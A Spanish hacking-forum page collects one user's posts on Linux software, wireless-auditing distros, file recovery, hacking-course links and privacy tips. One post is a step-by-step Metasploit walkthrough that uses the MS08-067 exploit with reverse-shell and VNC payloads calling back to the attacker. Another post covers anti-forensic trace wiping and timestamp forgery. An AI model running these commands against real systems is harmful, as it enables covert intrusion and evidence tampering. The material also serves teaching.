Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Stiuvert

#161


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es un software que permite instalar y utilizar fácilmente numerosos juegos y aplicaciones diseñados para funcionar con No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y del que ha sido liberada hace unos días la versión 4.0.16 que viene con algunas nuevas características interesantes.


A parte de mejoras varias y corrección de errores, ahora es posible ejecutar un archivo .exe desde la terminal, han añadido soporte para No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, acceso a los discos virtuales desde su directorio de inicio, registrando los sucesos para simplificar la depuración de wine y más cosas.


Algunas de las características a parte de las ya mencionadas son:


 

  • Comprueba la correcta configuración de la tarjeta de vídeo

  • Soporte para Origin y Desura

  • Incluye instalación automática de Gecko

  • No más mensajes "winemenubuilder not found"

  • Posibilidad de salir de un proceso de instalación "atascado"

  • Colorear la salida del terminal

  • Muchas correcciones de errores

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Para instalarlo, en su No tienes permitido ver los links. Registrarse o Entrar a mi cuenta podemos encontrar el código fuente o instaladores para Archlinux, Debian, Fedora, Frugalware y Ubuntu. Este ultimo también dispone de repositorios para diversas versiones.


La instalación para Ubuntu 11.10 y LinuxMint12, sería:
Citar

wget -q "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" -O- | sudo apt-key add -
sudo wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -O /etc/apt/sources.list.d/playonlinux.list
sudo apt-get update
sudo apt-get install playonlinux


Para más información sobre los cambios, modo de instalación y su descarga, no dudéis en visitar su No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.
#162


En este tutorial explicare como acceder a una PC con Windows XP (sin sus actualizaciones de seguridad) utilizando No tienes permitido ver los links. Registrarse o Entrar a mi cuenta en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y el famoso exploit No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.
La idea de este tutorial es que sepan lo vulnerable que es un sistema sin descargar las actualizaciones.

Requisitos para este tutorial:
- La PC a la que vamos a acceder debe tener Windows XP, SP1, SP2 o SP3, Windows 2000 o 2003. Y no debe tener los parches de seguridad. Tambien recomendaria desactivar firewalls y antivirus para evitar problemas.
- Para simplificar el tutorial supondremos que la PC a atacar esta en la misma red que la PC Atacante. El exploit tambien funciona con PCs que no esten en la misma red, solo que hay que tener en cuenta otras variables, como el router y el firewall, que no se tendran en cuenta en este tutorial.
- Usare como SO atacante BackTrack 5 que ya viene con todas las herramientas, pueden descargar la iso desde la pagina oficial --> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Despues que descargaron la iso la guardan en un CD/DVD y arrancan el Sistema operativo desde el CD/DVD, o si no pueden usar una maquina virtual como vmware, o virtual box y arrancar el sistema operativo desde la iso. No detallare esto ya que hay mucha informacion en internet de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Comenzamos...

1- Comenzamos obteniendo nuestra ip local para saber donde estamos ubicados en la red. Para ello ya dentro de BackTrack Abrimos una Terminal (Ctrl+Alt+T) y escribimos:

ifconfig

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Como podemos ver nuestra IP local es 10.0.0.3, podria ser otra del tipo 192.168.X.X o de otro tipo. Apuntamos esta direccion porque nos servira mas adelante.

2- Escaneamos la red con nmap para obtener la direccion IP de los posibles objetivos. Como nuestra IP local es 10.0.0.3, buscaremos objetivos entre el rango 10.0.0.1 y 10.0.0.30, para ello escribimos lo siguiente

nmap -sS -O [Rango de IP]

Ejemplo: nmap -sS -O 10.0.0.1-30
Ejemplo2: nmap -sS -O 192.168.1.1-255

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Como podemos ver tenemos una PC con Linux (que no es vulnerable al ataque) y otra con Windows XP, 2000 o 2003 que posiblemente es vulnerable al ataque. Y su IP es 10.0.0.4. Apuntaremos esta IP para usarla despues.
Si ya tenemos la IP del objetivo no es necesario hacer este paso asi que simplemente lo saltean.

3- Ya sabemos nuestra IP y la IP del objetivo asi que ahora procederemos al ataque.
Abrimos Metasploit escribiendo en la terminal:

msfconsole

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Nos saldra algo asi:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

4- Sleccionaremos el exploit Netapi escribiendo lo siguiente:

use exploit/windows/smb/ms08_067_netapi

5- Seteamos como objetivo a la IP de la PC con windows XP:

set RHOST [IP Objetivo]

Ejemplo: set RHOST 10.0.0.4

6- Ahora cargaremos el Payload. En este tutorial mostrare 2 tipos de Payload diferentes, "windows/shell/reverse_tcp" y "windows/vncinject/reverse_tcp"

"windows/shell/reverse_tcp" es una shell remota, se usa cuando se necesita discrecion. El usuario de la PC objetivo no notara que estamos controlando su PC.

Cargamos escribiendo lo siguiente:

set PAYLOAD windows/shell/reverse_tcp

7- Seteamos con nuestra IP local:

set LHOST [IP Local]

Ejemplo: set LHOST 10.0.0.3

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

8- Enviamos el exploit:

exploit

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Y listo! Acceso concedido, ya tenemos una shell remota de la PC con windows XP! Con esta shell tenemos acceso total.

Ahora como otra alternativa usaremos el Payload de VNC "windows/vncinject/reverse_tcp", este Payload permite ver el escritorio remoto. No es nada discreto.

Ahora podemos seguir a partir del punto 5, o seguir desde el punto 8. Es lo mismo.

9- Presionamos (Ctrl+C) para cerrar la conexion de la shell.

10- Cargamos el Payload escribiendo:

set PAYLOAD windows/vncinject/reverse_tcp

11- Seteamos con nuestra IP local:

set LHOST [IP local]
Ejemplo: set LHOST 10.0.0.3

12- Enviamos el exploit escribiendo:

exploit

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Y listo ya tenemos acceso remoto a la PC con windows XP mediante VNC!

Resumen de los comandos utilizados:

Tomando como ejemplo las siguientes IPs:
IP de nuestra pc (BackTrack): 10.0.0.3
IP de la PC objetivo (Windows XP): 10.0.0.4

Citarmsfconsole
ifconfig
nmap -sS -O 10.0.0.1-255
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.0.0.4
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.0.0.3
exploit

Como pueden ver son muy pocos los comandos utilizados, por lo que a una persona con conocimientos basicos de Metasploit se le hace muy facil acceder a una PC con windows XP sin los parches de seguridad.

Se recomienda actualizar windows XP para evitar este tipo de ataques.

Links de interes:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#163
Seguridad / 7 huellas que dejas en el PC sin saberlo
Marzo 31, 2012, 06:33:30 AM
La privacidad es un asunto que nunca se toma lo bastante en serio. Hoy en día, con las herramientas adecuadas, cualquiera puede entrar en tu ordenador, saber qué has estado haciendo en las últimas horas y usar esa información en tu contra.

Pasar un limpiador para borrar la caché de los navegadores es útil, pero hay sitios adonde ni siquiera los limpiadores llegan. Son huellas escondidas y a veces protegidas por el sistema operativo. Te las presentamos y te explicamos cómo borrarlas.

Caché de DNS

Cada vez que cargas una página web en tu navegador, Windows pasa la orden a un servidor DNS para que traduzca el nombre del dominio a una dirección IP. Para ahorrar tiempo, el sistema guarda muchas de estas equivalencias en una caché aparte. Ni que decir tiene, esta información puede sacarse con facilidad.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta permite ver todas las peticions DNS guardadas por Windows

Abre la opción --> File --> Load Windows DNS caché

Si alguien abre la caché de DNS, por ejemplo con DNSDataView, sabrá qué páginas visitas con mayor frecuencia. Para borrarla, puedes usar esa misma utilidad o bien teclear ipconfig /flushdns en la línea de comandos. CCleaner también permite hacerlo desde la sección Sistema, pero la casilla está desactivada por defecto.


Identificadores de memorias y discos USB conectados

Quizá no sepas que cada vez que conectas un disco a un ordenador con Windows, su identificador queda almacenado en el Registro de Windows. Se puede sacar información tan valiosa como el número de serie, la marca, el modelo y cuando se escribió en el aparato por última vez.



USBOblivion borra las huellas de todas las memorias extraíbles que conectaste en el pasado

Para borrar estas huellas puedes usar USBOblivion, una utilidad portable que escanea el Registro en busca de identificadores de dispositivos de almacenamiento extraíble y los elimina.


Caché de Flash y Java


La caché de los navegadores web se limita a las páginas web y a las imágenes. Muchas aplicaciones web programadas con Flash y Java no se ven afectadas por la limpieza de caché clásica, puesto que almacenan archivos en las caché de los plugins.

CCleaner puede borrar tanto la caché de Flash como la de Java, pero si prefieres tener más control sobre lo que borras hay que recurrir a los paneles de cada complemento. Para Flash, entra en Panel de control de Flash y echa un vistazo al contenido.



Cookies, imágenes, sonidos, partidas de juegos web... la caché de Flash es una mina

Por lo que se refiere a Java, sigue estos sencillos pasos del manual de Oracle. Si quieres evitar que Java almacene contenido temporal en el ordenador, desmarca la primera casilla de la Configuración de archivos temporales.

Borrar la caché de Java es bastante sencillo: solo tienes que hacer clic en Borrar archivos...

Archivo de paginación (Pagefile.sys)

El archivo de paginación, conocido también como espacio de intercambio o swap, se utiliza como memoria virtual en PC que no tienen suficiente RAM para algunas tareas. En el swap acaban muchos datos confidenciales.

En este artículo de Microsoft se explica cómo solicitar a Windows que limpie el archivo Pagefile.sys cada vez que se apague el equipo. Debes abrir el Editor de Registro (regedit.exe) y cambiar el valor ClearPageFileAtShutdown de esta clave:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management

El tipo debe ser REG_DWORD y el valor igual a 1. Ten en cuenta que activando esta limpieza el apagado tomará más tiempo, pero te asegurarás de que no queden contraseñas u otros datos en la memoria de intercambio.

Cambia el valor de ClearPageFileAtShutdown a 1 para activar el borrado del swap al apagar

Archivos borrados

Como explicamos en nuestro especial sobre borrado seguro, cuando borras un archivo desde la Papelera no lo estás eliminando para siempre; el PC evita emprender una tarea tan costosa como sobrescribir el disco varias veces.

El prodigioso Hardwipe borra archivos e incluso discos enteros de forma segura

Para eliminar archivos con total garantía de irreversibilidad, usa Hardwipe. Está traducido al español y es muy fácil de usar. Un correcto uso de herramientas de este tipo impide que Recuva y similares sean eficaces.

Fechas de los archivos

Cuando creas o modificas un archivo, el sistema toma nota del momento en que llevaste a cabo esas operaciones. Así, las fechas de creación, modificación y último acceso pueden decir mucho sobre la vida del documento. Cambiar estas fechas de manera efectiva es tan sencillo como usar Timestomp o File Touch.

Con File Touch puedes cambiar la fecha y hora de muchos archivos a la vez



Metadatos


Los metadatos son el carnet de identidad de un archivo. Pueden contener datos sobre el autor, el momento en que se creó el documento o el lugar en que tuvo lugar la edición. Útiles para algunos, peligrosos para otros, conviene saber cómo se borran.

Metadatos EXIF de una foto en formato JPG. Aparecen la cámara y la fecha original

En el especial sobre metadatos presentamos las mejores herramientas para eliminar y editar metadatos, como MetaStripper y Doc Scrubber. La mejor medida, con todo, consiste en configurar los programas de antemano para que no graben metadatos.

Fuente:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Vía: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#164
Tras unos meses de desarrollo, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta rescata el proyecto WIFISLAX, el cual quedo hace un par de años en su version 3.1.

Lanzamos la version 4.0, bajo un sistema basado en porteus, slax, wifiway y slackware 13.37, WIFISLAX 4 esta formado por paqueteria slackware 13.37 con lo que es fácil de ampliar buscando los paquetes ya hechos y convirtiéndolos a xzm.

Es una version de tamaño reducido, pero con lo necesario para auditar wireless aprovechando todos los ataques conocidos, como el último y más sonado fallo en wps y la ultilidad que lo aprovecha (reaver-wps).

Tenéis toda la bateria de desencriptadores de patrones conocidos, jazzteldecrypter, wlandecrypter, wpamagic, etc etc, además de multiattack 1.0.7 el cual de un plumazo es capaz de demostrar la vulnerabilidad de los routers al alcance, todo de un plumazo.

Generadores de diccionarios para ataques wpa, sniffers de red como wireshark, firefox 10.0.2 como navegador principal, con flashplayer 11 activado.

El sistema pesa unos 200 megas aproximados, ¿ por qué aun siendo pequeño es grande en tamaño?, pues por que queremos ofrecer una base, en la cual se puede hacer otras cosas...como escuchar musica o ver videos..navegar ...ademas ofrecemos bastante cantidad de drivers de todo tipo, si empezásemos a quitar todo eso fácilmente saldría un sistema como los que circulan por la red de unos 50-60 megas ... pero no buscamos eso.

El sistema cuenta con el kernel 3.1.10 al que se le aplicaron varios parches ... como el aspm, que corregia el excesivo consumo de energia de los kerneles 3.1.x por un fallo, además se le añadio el parche de john kolivas, el cual hace que la cpu no este todo el tiempo consumiendo al 100%, y dos parches basicos para auditoria wireless, el famoso fix-channel-negative y el de fragmentación.

Se ha buscado deliberadamente que el aspecto sea como el de wifiway, usando sus mismos iconos aunque no tan agresivo el entorno.

WIFISLAX 4, se puede ampliar fácilmente mediante modulos xzm, o paqueteria slackware la cual se puede convertir a xzm con un sólo click, o añadiéndole el módulo devel, el cual cuenta con herramientas de desarrollo, como las gcc, git, o subversion para poder compilar vuestros propios programas, el módulo devel sólo sirve para eso...compilar codigo.

La distribucion ofrece soporte NATIVO, para la tarjeta wifistation interior, creo que somos los unicos que ofrecemos soporte a dicho adaptador, puesto que sólo se consigue editando parte de los drivers ath9k.

Al mismo tiempo que lanzamos la iso, se añadirán varios módulos de diversas índoles ...( aplicaciones, algun driver, etc.)

Se comenzó el sistema usando como base inicial una iso porteus 1.0rc2 a la cual se le fueron añadiendo y modificando cosas según las necesidades, este es el log del trabajo realizado.


CitarLIBRERIAS AÑADIDAS DEL REPOSITORIO SLACKWARE 13.37

-BISON
-FLEX
-LIBCAP
-cairomm-1.9.8-i486
-curl-7.21.4-i486
-iw-0.9.20-i486-1
-glibmm-2.27.99.2-i486
-iproute2-2.6.37-i486
-libXxf86dga-1.1.2-i486
-gtkmm-2.24.0-i486
-libsigc++-2.2.9-i486
-xdpyinfo-1.2.0-i486
-atkmm-2.22.5-i486
-libnet-1.1.5-i486
-pangomm-2.28.2-i486

-------
-CAMBIADAS GCC POR LAS DE BERNI VERSION 4.6.1 y sus 2 dependencias
-añadido kommander editor y executor
-añadido GIT 1.7.8
-añadido subversion 1.6.16
-añadido apr y apr-utils
-añadido  gparted 0.10.0
-añadido  record my desktop 0.3.8
-añadido  plugin flash 11.1 r102
-actualizadas glibc a version 2.14 de berni
-modificada secuencia de arranque para hacerla un poco mas vistosa

----------------------------Modulo wireless -------------------------
-aircrack-ng-trunk-2012-01-17-r2028
-airoscript nuevo portado de wifiway
-Alfatools ---> driver preinstalado,no necesitas instalarlo a cada sesion.
-cowpatty-4.6
-decsagem
-dlinkdecrypter-0.2
-ettercap-0.7.4
-feedingbottle-3.2
-Gambas-runtime
-GeneradorDiccio + configurador
-jazzteldecrypter-0.2.1
-john-the-ripper-1.7.9
-mac2wepkey
-macchanger-1.5.0
-minidwep-gtk-21026
-multiattack-1.0.6
-nmap-5.51
-ono4xx v0.0.4a
-pyrit-0.4.0
-reaver-1.3 + walsh 1.3
-R-WlanXDecrypter0.9
-salvar_sesion_reaver
-stkeys
-Stringenerator-1.3
-tele2dic_v0.2
-wepattack-0.1.3
-wepcrack
-wicd-1.7.0
-wifi-radar-2.0.s08
-wireshark-1.6.5
-wlan4xx-0.2.0
-wlandecrypter-1.3.3
-wlanreaver-0.5 ( adaptado a wifislax )
-Wpa-gui
-WPAmagickey-0.2.3

------- 20-01-2012 -----
-añadido   kismet-2011-03-R2
-añadido  tema gtk2 relight ( mismo tema gtk que wifiway )
-reconfigurado kde , en vez de utf8 , configurado a iso-8859-15 ( no da problemas con tildes
-reconfigurado rc6 , para que ejecute cleanup solo cuando estamos en live.
-actualizado gparted a version 0.11.0
-actualizado reaver a version 1.4-revision 102 ( test ok )

-------- 21-01-2012 ------
-retocado rc6 en la parte final del script faltaba codigo.
-eliminado del modulo core, ruta lib/modules/�2.6.37?
-modificado binario wpamagickey

--------22-01-2012---------
-cambiado idioma de sistema a español iso8859-15 (es_ES@euro)
-añadido enlace simbolico a libtheora
-añadido  libffi 3.0.10
-añadido  pgpme 1.3.0
-añadido  slapt-get-0.10.2j
-añadido  libassuan-2.0.1
-añadido gnupg-1.4.10


------23-01-2012-------
-añadido  liblinuxlive (importantisimo para txz2xzm , deb2xzm etc )
-añadido  stripdir (sin menus ni servicios ya que solo es para desaroolladores
-añadido  xzm2dir (para instalar modulos xzm desde instalacion hd)
-añadido make_xorg y make_xorg_list
-arreglados conversores txz a xzm y deb a xzm (ya todo puede ser convertido a xzm)
-añadido merge_modules (unir varios modulos en 1 )
-actualizado reaver a version 1.4 final

-------24-01-2012-----------
-modificado minidwep , ya no lanza el cartel molesto inicial.
-actualizada suite aircrack , a revision 2031 del dia 24 de enero 2012
-eliminados los firmwares de videocamaras etc (ahorro 5 megas xzm y 15 megas en hd)
-añadida configuracion drivers ath9k nocrypth=1
-actualizados drivers wireless a ( compat-wireless-2012-01-23 )
-eliminacion de elementos de escritorio tales como sistemas de color extra
-eliminacion de los ficheros readme
-conpilado el driver r8187 alfatools ( se puede prescindir totalmente del devel )

-------15-2-2012-----
-añadido crda 1.1.2 ( txpower y canales 12 y13 )
-actualizado multiattack a version 1.0.7
-retocado install (hwagm)
-actualizado firmware ar9170
-añadido M2Crypto-0.20.2-i486-1
-actualizados drivers wireless a version compat-wireless-2012-02-01
 con soporte para wifistation INTERIOR
-añadido el hdd module installer

-----18-02-2012------
-actualizada suite aircrack a version-r2101
-actualizados driver wireless a version 15-02-2012

---23-02-2012----
-actualizado gparted a version 0.12.0
-retiradas glibc-2.14 (incompatinilidad con kernel porteus)
-añadido glibc 2.13
-añadido kernel porteus 3.2.4
-actualizados drivers wireless , con soporte wifistation INTERIOR version 22-02-2012
-reconstruido modulo core ,para adaptarlo a kernel porteus
-remodificado initrd.xz para adaptar el arranque a wifislax
-remodificadas las opciones de arranque (eliminadas cosas obsoletas)

-------24-02-2012-------------
-configurado sistema a es_ES.utf8 ( es el que menos problemas da a la larga )
-eliminacion de kernel porteus
***** Integracion kernel 3.1.10 WIFISLAX *****
-Añadidas kernel soUrces recortadas
-Añadidos drivers compat-wireless con coporte wifistation INTERIOR

----25.02-2012--------
-RECOMPILADO KERNEL 3.1.10 por que no mostraba estado de bateria.
 parcheado driver ath9k de kernel , para no añadir stack compat
 wireless y añadirle a los drivers del kernel soporte nativo  a
 wifistation interior.

-------26-02-2012------
-arreglado servicio instalar paquetes slackware tgz y txz
-eliminado servicio convertir paquete rpm a xzm
-eliminado alfatools ( el driver no es valido en kerneles superiores a 3.1)
-eliminada gambas runtime (solo las usaba alfatools)
-ACTUALIZADO KERNEL A ULTIMA VERSION 3.2.7
-eliminado dlinkdecrypter por problema desconocido

------27-02-2012-------
-actualizado firefox a version 10.0.2

------28-02-2012-------------
-actualizado kernel a version de hoy mismo 3.2.8

--------02-03-012-------
-cambiado kernel a version 3.1.10 , por varios problemas detectados, sobretodo
 en cuanto a drivers , por ejemplo minidwep se hace un lio con los kernles 3.2.x
 ya que las interfaces al hacer iwconfig , ni siquiera se muestarn ordenadas.

-reconfigurado codificacion de sistema a es_ES@euro

-actualizada iw tool de 0.9.20 a version 3.3

---03-03-2012-----
-cambiado flashplayer 11 por version 10 mas estable
-recompilado kernel 3.1.10 + parche fragmentacion
-actualizado wicd a version 1.7.1
-añadida imlib que necesitaba kuickshow
-reconfigurado ksnapshot

----06-03-2012-----
-configurado crda a 20dbm
-creados 2 modulos de configuraciones a 27 y 30 dbm (dentro de la carpeta optional)
-recompilado kernel por que no mostraba el estado de la bateria
-eliminado de la raiz un simbolico llamado "sin" , que no valia para nada

--------13-03-2012---------
-corregido problemas con montaje/desmontaje unidades de almacenamiento
-eliminados simbolicos muertos en usr/bin
-corregido enlace simbolico de libstc++ para que la distro trabaje sin modulo devel

----20-03-2012-----
-añadida libreria ORBit2-2.14.19-i486-1
-añadida libreria libevent-2.0.11-i486-1sl
-añadida libreria libsoup-2.28.2
-añadida libreria GConf-2.32.1-i486-1
-añadida libreria libcanberra-0.28
-añadida libreria sudo-1.7.4p6-i486-1
-modificado minidwep ,ahora abre irodump y lo muestra mientras escanea y ataca.
-actualizado flashplayer a version 11
Como veis, el log acabo ayer mismo.

Agradecer a las personas que me han ayudado durante el desarrollo, mediante pruebas, ideas, avisos de actualicaciones etc.

Gracias al staff, que con la ayuda de todos son posibles estas cosas.




DESCARGA PRINCIPAL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

MD5: 0d683b85155ee4d87db418d8c6bce297
#165
GNU/Linux / Mapa interactivo del Kernel Linux
Marzo 30, 2012, 05:31:10 PM


Todos sabemos, o deberíamos, que el kernel Linux es el motor de cualquiera de nuestras distribuciones preferidas, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Conocerlo bien es esencial si te vas a dedicar a desarrollar para este sistema y requiere tiempo, conocimientos y experiencia, algo muchas veces fuera del alcance del usuario de a pie.


Pero eso no significa que no podamos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, o al menos conocer algo mejor como funciona. Por la red podemos encontrar extensos y completos manuales, la gran mayoría muy técnicos y por lo tanto pesados para un usuario normal. Pero si lo que queremos es conocer su funcionamiento de una forma fácil, podemos dar un vistazo a este Kernel interactivo.


Desde la web Make Linux, han elaborado un ingenioso mapa del No tienes permitido ver los links. Registrarse o Entrar a mi cuenta en forma gráfica, que van completando poco a poco, en el que podemos no solo ver su estructura sino interactuar directamente con el.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Mediante los enlaces de este mapa, encontraremos la información e incluso los archivos a todo lo referente a sus funciones, módulos, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, etc.


Además también nos muestran otro interesante mapa para conocer mejor el corazón de Android y como actúan sus aplicaciones, aunque este no es interactivo por ahora.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Si quieres conocer mejor Linux, no dudes en darte un paseo por este mapa interactivo del Kernel Linux, seguro que te parecerá interesante.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#166


No es la primera vez que me ocurre que cuando hago limpieza en un No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, me cepillo algún archivo que luego recuerdo que necesitaba.
Para los despistados como yo, esto tiene solución, existen un gran numero de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta pensadas para recuperar datos perdidos o borrados por error. Una de ellas es Foremost (forensic data recovery), que trabaja desde la linea de comandos con una sintaxis muy simple, pero muy efectiva.
Su forma más básica seria: foremost tipo_de_archivo_a_recuperar /directorio_de_búsqueda /directorio_de_salida.


Como siempre digo, es más fácil de entender como funciona con un ejemplo practico, así que vamos allá.
En este caso voy a utilizar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y un Pendrive (sdb1), que contiene una imagen jpg que borraré junto con la papelera, que es una carpeta oculta.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Aquí hago un inciso para comentar que yo he utilizado esta imagen como ejemplo, pero los formatos soportados son muchos más, entre ellos: jpg, gif, png, bmp, avi, exe, mpg, wav, wmv, mov, pdf, ole, doc, zip, xml, sxw, rar, htm, cpp, etc.


Comencemos, primero instalamos Foremost...
Citar

Código: text
[b]sudo apt-get install foremost[/b]


... y recuperamos la imagen:
Citar

Código: text
[b]sudo foremost -t jpg -i /dev/sdb1 -o /home/hispalis70/recuperado[/b]


La opción -t indica el tipo de archivo a buscar, si no sabemos cual es o queremos recuperar diferentes tipos de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, lo sustituiremos por all, que recuperará todos los archivos que encuentre. Con -i indicamos el lugar donde buscarlo y con -o donde guardarlo. La carpeta donde guardarlo la he llamado /recuperado y no hace falta crearla.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Tan sencillo como eso, si nos dirigimos a la carpeta creada veremos nuestra No tienes permitido ver los links. Registrarse o Entrar a mi cuenta de nuevo.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Pero, ¿y si hemos formateado el disco?


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


No hay problema, si no hemos escrito encima, el archivo se recupera igualmente aunque formateemos el disco.
Espero que os sea de ayuda.


Más información en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#167
Hacking / Curso de Hacking en Vídeo
Marzo 30, 2012, 01:28:44 PM
Curso basico de hacking

1.Introducción
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta    |    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

2.Footprinting
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta    |    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

3.Scanning
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta    |    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

4.Anonimato
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta    |    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

5.Enumeracion
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta    |   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

6.Ganando acceso
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta    |   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

7.Escalando privilegios
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta    |    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

8.Hardering
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta     |    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Curso avanzado hacking

0.Introduccion
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

1.Protocolos y servicios capas de red
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

2.Analisis de trafico metodo sniffing
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

3-4.Reconocimiento del objetivo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

5.Enumeracion del objetivo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

6.System hacking
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

7.Troyanos y backdoors
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

8.Virus y gusanos
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

9.Denegacion de servicio
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

10.Hacking wireless
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

11.SQL Injection
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

12.HoneyPots
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

13.Seguridad en VPN
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

14.Linux Hacking
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

15.Buffers Overflow
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

16.Vulnerabilidades WEB
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

17.Criptografia VPN
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

18.Codigo Virico
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

19.Escritura de Exploits
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

20.IDS y HIDS
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#168
Dada la reciente aparición de la suite de auditoría Backtrack en su versión 5 y revisión 2, me he animado a hacer un manual con los siguientes objetivos:

- Instalar BT5 en un pendrive con persistencia, es decir, que todos los añadidos, actualizaciones, instalaciones de paquetes que realicemos se conserven como lo harían en una instalación convencional en un disco duro.

- Tener una partición ( un espacio físico ) en el pendrive o dispositivo USB que utilicemos para poder intercambiar archivos y datos entre BackTrack y Windows de forma transparente.

- Explicar como queda el dispositivo USB después de la instalación y posibilidades que nos brinda.

Sin más , os dejo el link al documento en formato PDF.

Mirror 1: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Mirror 2: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Mirror 2: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Autor: niknaiz
Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#169
GNU/Linux / Blackbuntu
Marzo 30, 2012, 01:23:23 PM
Hola pues recien eh descubierto esta distribucion de linux llamada "Blackbuntu" que practicamente es ubuntu 10.10 con las herramientas del backtrack.
La ventaja que le veo es que no es necesario tener una distribucion para uso normal y otra para pentesting sino solamente puedes tener blackbuntu y trabajar perfectamente sin que te falte alguna herramienta ya sea para hacer la tarea o para hacer "pruebas de laboratorio" xD..






Pueden bajarlo de aca No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos!.
#170





   Características de la descarga:

   Formato: Pdf
   Compresión: .rar
   Peso: 71.9 MB
   Idioma: Español


   Descarga con No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


   Descarga con Depositfiles:


   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#171
Uno de los temas que más debe preocuparnos en nuestro ordenador es el mantenimiento del disco duro, ya que es en él en el que tenemos instalado nuestro sistema operativo, nuestros programas y donde guardamos nuestros datos.

El mantenimiento de un disco duro se debe mirar desde dos aspectos diferentes. Uno es el mantenimiento del disco en sí, desde el punto de vista de hardware y otro es el mantenimiento del disco duro en temas de software.

Vamos a empezar por el mantenimiento del disco duro como tal, es decir, como un componente del ordenador, y de camino vamos a ver la verdad que encierran algunos comentarios que circular por ahí.

Mantenimiento del disco duro (hardware):

El disco duro es un componente de harware bastante macizo, pesado... y bastante delicado, que, como todo elemento de nuestro ordenador, necesita de una cierta atención.

